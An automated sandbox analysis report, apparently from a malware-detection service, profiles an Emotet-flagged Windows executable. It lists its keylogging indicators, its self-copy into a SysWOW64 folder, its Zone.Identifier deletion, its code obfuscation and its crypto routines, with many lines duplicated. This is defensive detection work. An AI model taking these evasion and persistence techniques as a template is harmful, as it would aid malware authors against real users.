Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: 2ojdmC51As.exe, 00000000.00000002.667805094.000000000069A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: 2ojdmC51As.exe, 00000000.00000002.667805094.000000000069A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA, 0_2_00422473
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent, 0_2_00422488
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_0041580E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004238DC GetKeyState,GetKeyState,GetKeyState, 0_2_004238DC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer, 0_2_0041E95F
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_00412ABD
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 0_2_00410E05
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA, 0_2_00422473
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent, 0_2_00422488
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_0041580E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004238DC GetKeyState,GetKeyState,GetKeyState, 0_2_004238DC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer, 0_2_0041E95F
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_00412ABD
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 0_2_00410E05
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA, 1_2_00422473
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent, 1_2_00422488
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 1_2_0041580E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004238DC GetKeyState,GetKeyState,GetKeyState, 1_2_004238DC
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer, 1_2_0041E95F
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState, 1_2_00412ABD
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 1_2_00410E05

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 1_2_02272650

System Summary:

barindex
Creates files inside the system directory
Source: C:\Users\user\Desktop\2ojdmC51As.exe File created: C:\Windows\SysWOW64\setupugc\ Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe File created: C:\Windows\SysWOW64\setupugc\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\2ojdmC51As.exe File deleted: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe File deleted: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00408293 0_2_00408293
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004145CA 0_2_004145CA
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02238240 0_2_02238240
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02237740 0_2_02237740
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02236530 0_2_02236530
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233BA0 0_2_02233BA0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233F20 0_2_02233F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02231C70 0_2_02231C70
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233D10 0_2_02233D10
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00408293 0_2_00408293
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004145CA 0_2_004145CA
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02238240 0_2_02238240
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02237740 0_2_02237740
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02236530 0_2_02236530
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233BA0 0_2_02233BA0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233F20 0_2_02233F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02231C70 0_2_02231C70
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02233D10 0_2_02233D10
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00408293 1_2_00408293
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004145CA 1_2_004145CA
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02278240 1_2_02278240
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02277740 1_2_02277740
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02276530 1_2_02276530
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273BA0 1_2_02273BA0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273F20 1_2_02273F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02271C70 1_2_02271C70
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02273D10 1_2_02273D10
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02225ABE 1_2_02225ABE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0223F2F9 1_2_0223F2F9
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022292DE 1_2_022292DE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0222380E 1_2_0222380E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022258AE 1_2_022258AE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022280CE 1_2_022280CE
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0222573E 1_2_0222573E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02229DDE 1_2_02229DDE
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: String function: 00406520 appears 174 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: String function: 00405626 appears 49 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: String function: 00406520 appears 174 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: String function: 00405626 appears 49 times
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: String function: 00406520 appears 168 times
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: String function: 00405626 appears 44 times
PE file contains strange resources
Source: 2ojdmC51As.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: 2ojdmC51As.exe, 00000000.00000000.665451688.000000000043C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668161072.00000000025E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000000.665451688.000000000043C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668161072.00000000025E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: classification engine Classification label: mal80.troj.evad.winEXE@6/0@0/2
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00418C88 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA, 0_2_00418C88
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00418C88 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA, 0_2_00418C88
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle, 0_2_022387D0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle, 0_2_022387D0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02274CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification, 1_2_02274CB0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02274CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification, 1_2_02274CB0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00412121 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow, 0_2_00412121
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00412121 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow, 0_2_00412121
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02235070
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02235070
Source: 2ojdmC51As.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 2ojdmC51As.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2ojdmC51As.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\2ojdmC51As.exe 'C:\Users\user\Desktop\2ojdmC51As.exe'
Source: unknown Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\2ojdmC51As.exe 'C:\Users\user\Desktop\2ojdmC51As.exe'
Source: unknown Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc, 0_2_004013A4
PE file contains an invalid checksum
Source: 2ojdmC51As.exe Static PE information: real checksum: 0x69574 should be: 0x6a2b7
Source: 2ojdmC51As.exe Static PE information: real checksum: 0x69574 should be: 0x6a2b7
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406520 push eax; ret 0_2_0040653E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406830 push eax; ret 0_2_0040685E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02235E11
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02235EA1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02235EF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02235F21
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02235CD1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02235D21
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02235D01
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02235D51
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02235D91
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02235DF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02235DC1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406520 push eax; ret 0_2_0040653E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00406830 push eax; ret 0_2_0040685E
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02235E11
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02235EA1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02235EF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02235F21
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02235CD1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02235D21
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02235D01
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02235D51
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02235D91
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02235DF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_02235DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02235DC1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00406520 push eax; ret 1_2_0040653E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00406830 push eax; ret 1_2_0040685E
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275E10 push ecx; mov dword ptr [esp], 0000F5B3h 1_2_02275E11
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275EA0 push ecx; mov dword ptr [esp], 0000A3FDh 1_2_02275EA1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275EF0 push ecx; mov dword ptr [esp], 0000669Ch 1_2_02275EF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275F20 push ecx; mov dword ptr [esp], 0000E36Ch 1_2_02275F21
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275CD0 push ecx; mov dword ptr [esp], 00001CE1h 1_2_02275CD1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D20 push ecx; mov dword ptr [esp], 0000C5A1h 1_2_02275D21
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D00 push ecx; mov dword ptr [esp], 00001F9Eh 1_2_02275D01
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D50 push ecx; mov dword ptr [esp], 00006847h 1_2_02275D51
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275D90 push ecx; mov dword ptr [esp], 0000B2E0h 1_2_02275D91
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275DF0 push ecx; mov dword ptr [esp], 0000AAF5h 1_2_02275DF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02275DC0 push ecx; mov dword ptr [esp], 000089FAh 1_2_02275DC1
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0223EA26 push ebp; iretd 1_2_0223EA28
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02227A3E push ecx; mov dword ptr [esp], 0000A3FDh 1_2_02227A3F
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02227ABE push ecx; mov dword ptr [esp], 0000E36Ch 1_2_02227ABF
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0223EA8B push edi; ret 1_2_0223EAC3
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02227A8E push ecx; mov dword ptr [esp], 0000669Ch 1_2_02227A8F

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\2ojdmC51As.exe Executable created and started: C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Executable created and started: C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\2ojdmC51As.exe PE file moved: C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe PE file moved: C:\Windows\SysWOW64\setupugc\sort.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\2ojdmC51As.exe File opened: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe File opened: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0042252B IsWindowVisible,IsIconic, 0_2_0042252B
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004198B0 GetParent,GetParent,GetParent,IsIconic, 0_2_004198B0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00404F00
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0042252B IsWindowVisible,IsIconic, 0_2_0042252B
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004198B0 GetParent,GetParent,GetParent,IsIconic, 0_2_004198B0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00404F00
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0042252B IsWindowVisible,IsIconic, 1_2_0042252B
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004198B0 GetParent,GetParent,GetParent,IsIconic, 1_2_004198B0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect, 1_2_00404F00
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
